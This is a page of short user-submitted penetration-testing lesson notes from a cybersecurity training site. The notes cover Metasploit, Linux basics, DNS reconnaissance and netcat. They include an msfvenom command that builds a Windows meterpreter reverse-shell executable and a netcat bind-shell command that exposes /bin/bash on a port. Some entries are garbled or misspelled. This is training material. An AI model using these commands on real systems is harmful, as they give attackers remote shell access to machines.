Advanced Penetration Testing Notes

Metasploit commands

msfupdate – updates the modules ctrl+z – backgrounds the session sessions -l – lists all sessions [view]

By: Mcxrisley | Related Lesson: Metasploit (part 3) Operation | Modified: December 16, 2016

msfvenom

msfvenom –  encapsulate msfpayload and msfencode. –  into a single module   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.77 LPORT=1234 -f exe > meterpreter.exe to display list of options available msfvenom -p windows/ [view]

By: sau206 | Related Lesson: Metasploit (part 6) msfvenom | Modified: December 16, 2016

msfcli

msfcli -h   E – to execute [view]

By: sau206 | Related Lesson: Metasploit (part 5) msfcli | Modified: December 16, 2016

Crontab: Advance PenTest

crontab : automate jobs cd /etc ls | grep cron (went to file location of crontab and searched for the word cron)  [view]

By: Clouds | Related Lesson: Linux (part 6) Copy Commands and crontab | Modified: December 14, 2016

NetCat : nc : Advanced PenTest

nc -lvp 1234 (Listening on port 1234 verbosely) nc -lvp 1234 -e /bin/bash (same as above just whosoever connect on port 1234 it gives the shell access to that person)     [view]

By: Clouds | Related Lesson: Linux (part 5) IP Addressing and netcat | Modified: December 14, 2016

Targeting Email and Maltego

harvest targt.co [view]

By: Genilson Mess | Related Lesson: Information Gathering (part 3) Targeting Email and Maltego | Modified: December 14, 2016

Chmod, Manipulation, Packages: Advanced Pentest

Read – 4 Write – 2 Execute -1 chmod 777 (read write execute for user group other) filename               750(full to user, read and execute to group, nothing to other) just add x(execute for all) chmod +x filename   [view]

By: Clouds | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: December 14, 2016

Directories,MyFiles and Nano: Advanced pentest.

to rename  mv file file2 to remove rm file2 echo > hello filename but every time we use ’>’ it overrides the previous line so to append we use ’>>’       [view]

By: Clouds | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: December 14, 2016

gathering dns

whois any.com nslockup >set type=ns >cisco.com exit host -l ns sec.com ns sick.com host -t ns sec.com fierce -dns host.com [view]

By: Genilson Mess | Related Lesson: Information Gathering (part 2) Domain Name Services | Modified: December 14, 2016

get info

get info [view]

By: Genilson Mess | Related Lesson: Information Gathering Intro (part 1) | Modified: December 14, 2016

« First ‹ Previous 1 99 189 197 198 199 200 201 209 243 Next › Last »

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel